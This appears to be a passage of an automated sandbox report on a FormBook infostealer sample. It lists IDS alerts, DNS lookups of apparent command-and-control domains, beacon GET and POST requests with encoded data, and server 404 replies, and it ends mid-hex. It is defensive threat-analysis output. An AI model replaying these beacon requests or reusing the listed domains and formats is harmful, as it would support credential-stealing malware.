                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 134.122.133.80:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 47.254.140.255:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 93.127.192.201:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 85.159.66.93:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 136.243.64.147:80
                Source: DNS query: www.fersigorta.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.48.1 104.21.48.1
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: ASMUNDA-ASSC ASMUNDA-ASSC
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\NWPZbNcRxL.exeCode function: 0_2_00C822EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00C822EE
                Source: global trafficHTTP traffic detected: GET /blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.f5jh81t3k1w8.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lmueller.devConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /nhb9/?V8=TPU4dumIi+D1nx6dGJD9W6GSZGJOmofRCRQtffc6GrD6UQOtZPepFdRZleg/11G771jgytlZx/KAXkWBKMhiKuCHTM0VrIEGohPTLQH2eOGOmwQk+g1Zd36VNj9HTWnDYA==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.valuault.storeConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /rl5p/?Bb6h7=gBiPvnrHa&V8=U5nb6F2D+6Ub+BbGgn/WBcZABtiKGjnTMliNxQrWrtMhCM2XjoMK5ippUQtHm0xX3cajxvPhwbFvkKUzAaSZHL5crW9oCCkqzTfN0RC5pEjEcoIvYgKfrFT9zkKgJZ+CcA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.odvfr.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.fersigorta.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.vh5g.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /8efo/?V8=T2NGoo7Qxcyqrqz3MX03hpQWSivm/Bj7gd/lPuHNqm/993Y45l+K5XkRQc/91P+Wf5o+Fy5PkbYLO4eQBkWEWabH/6z+kfBygbxby0fAgVFPJA+Djx5wnWVAkFd+F7WzDg==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.marketyemen.holdingsConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /0pui/?V8=8E9ba00UjFo7PU/eEqgVWkIK94OcHqokbV3+SylgnD70KIDAP1aAQbV/7FCow/l5youCP7Vx0oTyvxMws++GcEtPIIait+3tzbwSXdRUlhYH624U7nSdIoyPDL7sOl16Zw==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.deacapalla.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /tw42/?V8=lppBzHasG2q3W2gwBEigKs+lYs+CAuXKSLpv0GvBrwIC17Gf2xLaVk86ThwJgseC0DRvoxJH/zAsXU58KuU4W+pKTj7Ns/0A3sApM0dQZei9OXaCVa2j9SlaFImncTaD0Q==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.100millionjobs.africaConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /j2vs/?Bb6h7=gBiPvnrHa&V8=ojS/2P5nrhKWG869xfViz2uaiQ4dB6fmN9sQwMDG5q6PFmCkgI7u5WRyoS939Z0WQWWR6oSqfY2a6i6yoynlWLywOB6FnF6t61mCd33fp8fgqeNJIahdroNOItErrJD4XA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.axis138ae.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /iuei/?Bb6h7=gBiPvnrHa&V8=ueDaiuOcYsSp9Xkcl1oB9tm+tEnnENLgHwvKheTa7AKLOQ8fO2SBLqueUKoOI6xeDW+RE21fFYk3KnUadQilvOUj3f5vRoUOjIAyrnG2dTWXtM1xYmeCqswVLQjzw0rbHw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.x3kwqc5tye4vl90y.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficHTTP traffic detected: GET /qfbg/?V8=FozauU3I+LP/9Nj8g7b6dv8gCpZwHtVW5jJ9IM/S40uIbg9HP9G2UPrJfaUkURrP7SWnfEhe84Vk8Ui0+mXxkZIdFJ1enIwMA3s4LYaZdtjwXCRSGeLNYZPp7qU7y2jovw==&Bb6h7=gBiPvnrHa HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.al-madinatraders.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                Source: global trafficDNS traffic detected: DNS query: www.f5jh81t3k1w8.sbs
                Source: global trafficDNS traffic detected: DNS query: www.lmueller.dev
                Source: global trafficDNS traffic detected: DNS query: www.valdevez.net
                Source: global trafficDNS traffic detected: DNS query: www.valuault.store
                Source: global trafficDNS traffic detected: DNS query: www.odvfr.info
                Source: global trafficDNS traffic detected: DNS query: www.fersigorta.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vh5g.sbs
                Source: global trafficDNS traffic detected: DNS query: www.envisionmedia.shop
                Source: global trafficDNS traffic detected: DNS query: www.marketyemen.holdings
                Source: global trafficDNS traffic detected: DNS query: www.deacapalla.online
                Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                Source: global trafficDNS traffic detected: DNS query: www.elettrocoltura.info
                Source: global trafficDNS traffic detected: DNS query: www.axis138ae.shop
                Source: global trafficDNS traffic detected: DNS query: www.reynamart.store
                Source: global trafficDNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
                Source: global trafficDNS traffic detected: DNS query: www.al-madinatraders.shop
                Source: unknownHTTP traffic detected: POST /z8lg/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.lmueller.devCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Origin: http://www.lmueller.devReferer: http://www.lmueller.dev/z8lg/User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 47 4a 6a 35 56 47 30 6a 6c 61 34 55 68 2b 56 66 61 65 62 50 75 73 32 58 7a 4e 77 41 58 51 2f 33 44 43 5a 30 61 53 53 54 4d 4f 72 50 4b 64 50 4a 33 37 57 4d 50 46 45 6a 70 45 55 54 4a 57 46 74 38 36 35 70 52 69 65 4b 33 54 76 69 66 54 45 6d 48 6e 33 4b 6a 6e 33 58 32 38 4a 6b 49 48 7a 76 62 31 73 67 7a 67 5a 54 55 59 6c 49 62 64 50 30 39 6e 48 6b 6e 78 32 6b 56 65 33 51 47 31 56 38 30 63 65 35 46 62 5a 32 4d 4a 65 66 58 76 37 67 57 4b 6e 30 2b 77 31 48 64 43 2b 68 56 6a 45 68 38 64 4f 72 51 38 47 30 56 61 56 6b 67 49 4c 6c 4e 6c 42 75 73 50 6b 4e 46 30 73 3d Data Ascii: V8=Q8GV0qNEbfcOGJj5VG0jla4Uh+VfaebPus2XzNwAXQ/3DCZ0aSSTMOrPKdPJ37WMPFEjpEUTJWFt865pRieK3TvifTEmHn3Kjn3X28JkIHzvb1sgzgZTUYlIbdP09nHknx2kVe3QG1V80ce5FbZ2MJefXv7gWKn0+w1HdC+hVjEh8dOrQ8G0VaVkgILlNlBusPkNF0s=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 15:41:47 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:22 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:25 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:27 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:39:30 GMTServer: Apache/2.4.10 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 